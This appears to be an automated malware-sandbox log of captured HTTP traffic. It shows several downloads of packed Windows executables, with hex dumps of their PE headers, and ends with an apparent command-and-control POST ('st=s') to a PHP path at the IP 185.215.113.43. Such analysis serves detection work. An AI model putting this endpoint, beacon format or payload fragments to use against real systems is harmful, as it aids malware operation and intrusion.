Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 22:21:27 GMTContent-Type: application/octet-streamContent-Length: 1827328Last-Modified: Fri, 22 Nov 2024 21:39:46 GMTConnection: keep-aliveETag: "6740fa22-1be200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 24 01 00 00 00 00 00 00 40 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 6a 00 00 04 00 00 f3 0b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2b 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6a 66 61 70 71 62 78 00 50 1a 00 00 e0 4f 00 00 44 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 68 77 71 6c 6f 6f 7a 00 10 00 00 00 30 6a 00 00 04 00 00 00 bc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 6a 00 00 22 00 00 00 c0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 22:21:36 GMTContent-Type: application/octet-streamContent-Length: 922624Last-Modified: Fri, 22 Nov 2024 21:37:53 GMTConnection: keep-aliveETag: "6740f9b1-e1400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 f9 40 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 64 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 18 de 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 58 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 a8 00 00 00 40 0d 00 00 aa 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9e 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 22:21:43 GMTContent-Type: application/octet-streamContent-Length: 2748928Last-Modified: Fri, 22 Nov 2024 21:38:19 GMTConnection: keep-aliveETag: "6740f9cb-29f200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 7e 9c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 6c 72 78 61 6c 79 71 00 a0 29 00 00 a0 00 00 00 90 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 64 71 6e 6b 64 6d 72 00 20 00 00 00 40 2a 00 00 06 00 00 00 ca 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 d0 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 22:21:50 GMTContent-Type: application/octet-streamContent-Length: 2748928Last-Modified: Fri, 22 Nov 2024 21:38:22 GMTConnection: keep-aliveETag: "6740f9ce-29f200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 7e 9c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 6c 72 78 61 6c 79 71 00 a0 29 00 00 a0 00 00 00 90 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 64 71 6e 6b 64 6d 72 00 20 00 00 00 40 2a 00 00 06 00 00 00 ca 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 d0 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 22:21:54 GMTContent-Type: application/octet-streamContent-Length: 4410880Last-Modified: Fri, 22 Nov 2024 20:02:40 GMTConnection: keep-aliveETag: "6740e360-434e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 30 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 60 c5 00 00 04 00 00 fd 78 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 19 c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 19 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 6b 69 68 63 6b 79 7a 00 a0 1b 00 00 80 a9 00 00 9c 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6e 71 68 63 68 66 76 00 10 00 00 00 20 c5 00 00 04 00 00 00 28 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 c5 00 00 22 00 00 00 2c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 22:22:03 GMTContent-Type: application/octet-streamContent-Length: 2748928Last-Modified: Fri, 22 Nov 2024 21:38:22 GMTConnection: keep-aliveETag: "6740f9ce-29f200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 7e 9c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 6c 72 78 61 6c 79 71 00 a0 29 00 00 a0 00 00 00 90 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 64 71 6e 6b 64 6d 72 00 20 00 00 00 40 2a 00 00 06 00 00 00 ca 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 d0 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 22:22:35 GMTContent-Type: application/octet-streamContent-Length: 2748928Last-Modified: Fri, 22 Nov 2024 21:38:22 GMTConnection: keep-aliveETag: "6740f9ce-29f200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 7e 9c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 6c 72 78 61 6c 79 71 00 a0 29 00 00 a0 00 00 00 90 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 64 71 6e 6b 64 6d 72 00 20 00 00 00 40 2a 00 00 06 00 00 00 ca 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 d0 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
